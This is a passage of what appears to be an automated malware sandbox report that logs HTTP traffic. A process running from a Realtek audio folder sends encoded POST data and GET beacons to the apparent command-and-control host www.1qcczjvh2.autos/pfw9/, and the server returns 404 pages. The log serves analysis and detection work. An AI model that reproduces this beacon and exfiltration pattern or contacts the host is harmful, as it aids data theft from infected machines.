                                                                                                  Data Ascii: ABahkHg2jsPZmHjTPXBok+9wCwDbaWy7ImOkSF7HshljJTH4lfbRcJAk2+k8ROVtnvfgMB6H5Xps7v6pOC7pcnqGCqAgO+0kQ47BeoRlR8brAHwHoFH+4wyooQaVTjebo220+2njFZ3+9eqljVd0KgdgJh7VsQIAcBx2XLvDSoIeUcyoCGAVjW1bqDMhec0wwfbdmU+wtw4QJTt2KEWjwjzLLi7E47Bcj01HJPB0LzU9k2A/yj0
                                                                                                  Dec 3, 2024 09:48:54.198555946 CET1289INData Raw: 2f 44 67 41 6a 77 4f 79 35 55 51 4d 51 43 32 55 6d 42 4d 5a 74 47 55 43 35 56 51 57 42 6d 76 67 6c 67 42 59 4e 6d 52 38 65 30 41 4c 49 47 4e 44 7a 34 52 55 6e 76 57 61 7a 32 47 52 72 51 65 44 49 34 61 32 47 2b 61 6e 51 4b 4a 2f 31 71 48 4a 55 44
                                                                                                  Data Ascii: /DgAjwOy5UQMQC2UmBMZtGUC5VQWBmvglgBYNmR8e0ALIGNDz4RUnvWaz2GRrQeDI4a2G+anQKJ/1qHJUDIAnDEnh0ByMo1z76ZNr8i0jP7w+ZoiGbQ2HZvA4BO4BUkQLMyYJQDhjQbZgwEm5IOHhzD47BcCWNW2HBYREhnBBPUgv08wsS0K7+e/7QZgJ9hJ1SihJfmE6r2AoNGNUVZR2k2i9pp90v5T+W9kMkAMB+21RIAAAwI
                                                                                                  Dec 3, 2024 09:48:54.198615074 CET1289INData Raw: 50 44 73 63 34 31 42 31 6a 75 5a 71 56 31 58 50 58 69 73 4b 54 55 6e 50 52 66 63 68 67 37 50 75 76 34 44 75 38 71 50 67 48 56 76 41 58 31 2f 44 79 7a 63 67 42 65 42 6a 41 58 77 48 34 41 32 77 31 47 2f 54 53 44 55 64 38 32 7a 2b 50 2b 31 79 6b 79
                                                                                                  Data Ascii: PDsc41B1juZqV1XPXisKTUnPRfchg7Puv4Du8qPgHVvAX1/DyzcgBeBjAXwH4A2w1G/TSDUd82z+P+1ykyhocA3M7M7OJTp2oCGCs66NBsPd+gdEktAysy/CFQp5lIlbvlQqe2t9B+FGADWNR/z1k9jCUcCjTZTaL4+vqzU8MxI24gigrt8NGGZUpiIlHhOYUckAHGnYCf1naFZ4YkNt34n54SGox6jcGob2Yw6scC2AhZMPJry
                                                                                                  Dec 3, 2024 09:48:54.198625088 CET1289INData Raw: 38 43 41 41 71 6a 6e 2b 74 6c 4d 35 76 72 79 46 2b 38 37 4d 61 53 57 72 72 70 39 4b 4d 4a 39 73 42 66 76 34 41 33 67 62 77 43 34 42 59 67 31 48 2f 69 63 47 6f 2f 39 66 6d 75 5a 45 73 54 57 4c 7a 43 5a 39 6d 4d 72 64 6e 50 35 36 2f 44 71 76 34 71
                                                                                                  Data Ascii: 8CAAqjn+tlM5vryF+87MaSWrrp9KMJ9sBfv4A3gbwC4BYg1H/icGo/9fmuZEsTWLzCZ9mMrdnP56/Dqv4qAQyY7fAWFq22VKnkNZzmlauOpiGtewJnnvexi1uAYhwrOf/KaIAHLdnlGWyDv3pzJQuuJPSEwwPT5t9vZq1qdQ0niP6UxqGAeA4uhxapflB+OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUq
                                                                                                  Dec 3, 2024 09:48:54.198637962 CET1289INData Raw: 39 56 38 61 6a 48 70 62 49 34 79 2f 6c 53 34 31 77 78 6b 41 6d 33 6c 6f 41 47 43 52 78 4a 61 52 47 61 74 4b 77 47 78 35 65 4c 64 51 46 43 2b 66 75 58 2b 33 4f 73 73 6e 42 4b 6a 6d 2b 5a 68 75 4e 53 65 75 51 70 32 4b 63 32 42 62 30 66 52 33 46 68
                                                                                                  Data Ascii: 9V8ajHpbI4y/lS41wxkAm3loAGCRxJaRGatKwGx5eLdQFC+fuX+3OssnBKjm+ZhuNSeuQp2Kc2Bb0fR3FhXrKW2fR7+QyNOQi3XYJTXX8vn5lHn1kZDaB7L8DgcVH9K8YoX9RCQCgIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPu
                                                                                                  Dec 3, 2024 09:48:54.200400114 CET1289INData Raw: 41 56 34 73 6b 70 53 64 51 41 49 30 47 6b 6d 55 39 66 65 41 6e 54 71 79 58 61 61 69 73 4d 39 4b 69 78 45 77 67 4f 41 2f 6f 30 2b 76 51 42 41 38 64 72 4a 6a 5a 53 73 52 5a 66 33 7a 43 42 6b 35 67 79 42 56 74 55 79 4c 64 64 36 55 38 50 7a 4f 30 61
                                                                                                  Data Ascii: AV4skpSdQAI0GkmU9feAnTqyXaaisM9KixEwgOA/o0+vQBA8drJjZSsRZf3zCBk5gyBVtUyLdd6U8PzO0at2c0gcB0UNHH6n5AOZTDqtQajfgRkJZW3ATiiQZUYoNP0G9dmZtcOCze9iK7PXYDAv2TDPgU66oqD5ufAYVGBcxIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dg
                                                                                                  Dec 3, 2024 09:48:54.541768074 CET1289INData Raw: 30 31 5a 77 75 4b 57 4c 65 78 53 6c 4b 48 6e 30 38 76 58 48 52 36 77 49 35 50 77 62 42 55 61 59 4d 43 78 33 30 51 4d 72 37 44 79 53 39 4f 78 41 62 34 61 37 33 61 36 51 54 56 61 43 6a 63 38 63 6c 44 44 57 41 73 67 4b 30 47 6f 37 36 6d 41 39 65 35
                                                                                                  Data Ascii: 01ZwuKWLexSlKHn08vXHR6wI5PwbBUaYMCx30QMr7DyS9OxAb4a73a6QTVaCjc8clDDWAsgK0Go76mA9e5gh2AXcVJ/o/k+53xzek15Ut4n2hRpcQPjef+lg5v7XQF7V+EA9OcJ51+jSIvADhYyCkRchhKDIAoMPY8GHsawGtE+AWwcJCkJgB8FNxmi+t6bB+DUV/aYNR/C2AhlBUheYBVp+Ln9Aup3Th86uoEGh22J6/qktKR2


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  19192.168.11.3049883129.226.153.85805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:56.730424881 CET2578OUTPOST /pfw9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.1qcczjvh2.autos
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.1qcczjvh2.autos
                                                                                                  Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 46 53 77 6e 6c 71 38 4f 35 37 54 4c 7a 51 72 6f 79 59 73 53 6f 70 61 63 65 67 64 62 59 58 6e 79 77 4d 6f 42 34 48 53 47 6f 43 34 4e 66 55 44 4b 78 34 65 69 7a 73 6f 52 4f 38 46 31 53 5a 6b 49 49 4a 4a 39 4d 62 69 4a 48 6d 31 4b 56 6d 31 42 51 35 72 32 66 76 6b 6d 47 47 39 32 47 68 35 32 4a 6a 70 77 51 75 4f 65 35 6f 6b 65 71 68 49 42 47 67 33 58 6f 47 4e 4f 76 47 4d 55 42 42 67 42 6a 33 5a 4a 58 79 38 70 78 79 32 43 66 55 6b 38 59 42 49 48 46 2b 6a 41 72 44 31 5a 35 47 41 6c 52 4d 79 5a 36 6d 51 2f 62 49 63 72 59 66 6e 64 69 47 55 68 5a 6e 62 5a 33 55 52 59 72 70 63 72 79 6b 4d 68 57 42 42 69 54 65 4f 34 39 74 64 50 65 4a 52 42 31 67 79 6e 4e 4a 53 45 62 50 56 46 66 4f 4d 6b 79 7a 36 63 7a 69 54 41 38 59 50 5a 63 51 37 4b 50 63 43 6e 50 44 56 54 76 33 50 58 48 61 68 52 51 31 41 52 35 33 4f 75 57 6c 41 61 36 69 61 6e 55 6f 37 56 66 55 64 36 65 38 33 53 2b 33 4c 39 72 41 68 31 78 37 6a 62 75 32 4c 36 37 6a 4b 4c 5a 47 5a 44 46 47 61 2b 68 58 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXnywMoB4HSGoC4NfUDKx4eizsoRO8F1SZkIIJJ9MbiJHm1KVm1BQ5r2fvkmGG92Gh52JjpwQuOe5okeqhIBGg3XoGNOvGMUBBgBj3ZJXy8pxy2CfUk8YBIHF+jArD1Z5GAlRMyZ6mQ/bIcrYfndiGUhZnbZ3URYrpcrykMhWBBiTeO49tdPeJRB1gynNJSEbPVFfOMkyz6cziTA8YPZcQ7KPcCnPDVTv3PXHahRQ1AR53OuWlAa6ianUo7VfUd6e83S+3L9rAh1x7jbu2L67jKLZGZDFGa+hX+n+gPXMDwnl9WJOICJCQSPfBAtu7twdkwkP5qBVLRZhaZt4H+wtlG9d5x8kble/2MefuisTRZDf+4vYsf+dWfTO/GLf6+4PDpLb6CH5jmTa1uUG1G4uwpcXbYr7H/YjwttBxDY+NxOWPZ9Vw4uqRYdV9AmYRO7Nn5GSu0IR46sSbA8M5ibrhR5bFUrImy7XAVQTA3uaXMQR0GpTDr43dtab4Ky68ftI7dibfoS1xBurpuc0acOG68/kOnem0Xit/gyeIHWYUpMdGlWYaJW/x8R2XkcczrVgXeX8GPrzz38YWwrFlPJEzYN44hTmR4mgdmpTSfrOarYN//ubV6jiB+vA4ZUrKA2mk7FnCCarLBvm/heDdT1DDeAyswCUqUVo2INyyZcBA35eRfhm3yWVe1H55ahGIJFeN8EYzmWpGofVxntHAPAQSy7gON6VwH31wfbM/oC+V0uG0YCEoC3lgcrvEVo8/NzyZSvsqsNrGF3fU1rrg88vOTfgeKrEheyngP6JpZnymQs/+vvZuE51M0rG9fazJvSyyeeGOJV5rWibT70OYdKJBlYnnQqt0B893AHjReTiTvZMxu5+KOi+lS/Bgxd2+Xz31eXLPABjyqhMie3De6bwMfSCX1IxziZ517f41sQhBfOYTcJ8cAcDEf+/ac5YAs4m5Yj [TRUNCATED]
                                                                                                  Dec 3, 2024 09:48:56.730457067 CET1240OUTData Raw: 56 6c 51 76 52 4a 64 4b 33 76 77 52 4f 50 4c 55 7a 38 45 73 6a 6c 57 6e 56 58 48 64 48 5a 7a 5a 6b 35 46 4b 4c 6c 6d 37 78 63 74 68 69 4d 6a 72 4f 50 6f 50 31 4e 6f 5a 31 36 63 66 41 62 7a 65 63 75 42 67 68 49 68 37 6a 50 71 46 64 2f 4a 63 75 70
                                                                                                  Data Ascii: VlQvRJdK3vwROPLUz8EsjlWnVXHdHZzZk5FKLlm7xcthiMjrOPoP1NoZ16cfAbzecuBghIh7jPqFd/JcupbDakD6Eemq5PmhpeZSMBo5nD4vX24Tibdvrc3JpJiWyzCbDm2pQq+Bpwq/QwMGiQhKeX88sVYPg/YSCTUGZ3bfMtbd3qOadsrOOg2/tUhhOsRVrTGVqPbEyPPeTof/VaNAj5OqI5OVYfAzWMFvzrDvTyIxKE4nP1p
                                                                                                  Dec 3, 2024 09:48:57.077512026 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:48:56 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58288
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67344967-e3b0"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:48:57.077534914 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:48:57.077596903 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:48:57.077653885 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:48:57.077662945 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                  Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                  Dec 3, 2024 09:48:57.077672005 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                  Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                  Dec 3, 2024 09:48:57.077678919 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                  Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                  Dec 3, 2024 09:48:57.077742100 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                  Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                  Dec 3, 2024 09:48:57.077779055 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                  Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                  Dec 3, 2024 09:48:57.079758883 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                  Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  20192.168.11.3049884129.226.153.85805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:59.613596916 CET416OUTGET /pfw9/?6aonl5x=45l5W170mEENNSUktK0c1bHcj3rn0rpe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF2xmeGRELDNSdfeX9e8=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.1qcczjvh2.autos
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:48:59.969752073 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:48:59 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58288
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67344967-e3b0"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:48:59.969899893 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:48:59.969908953 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:48:59.969917059 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:48:59.969950914 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
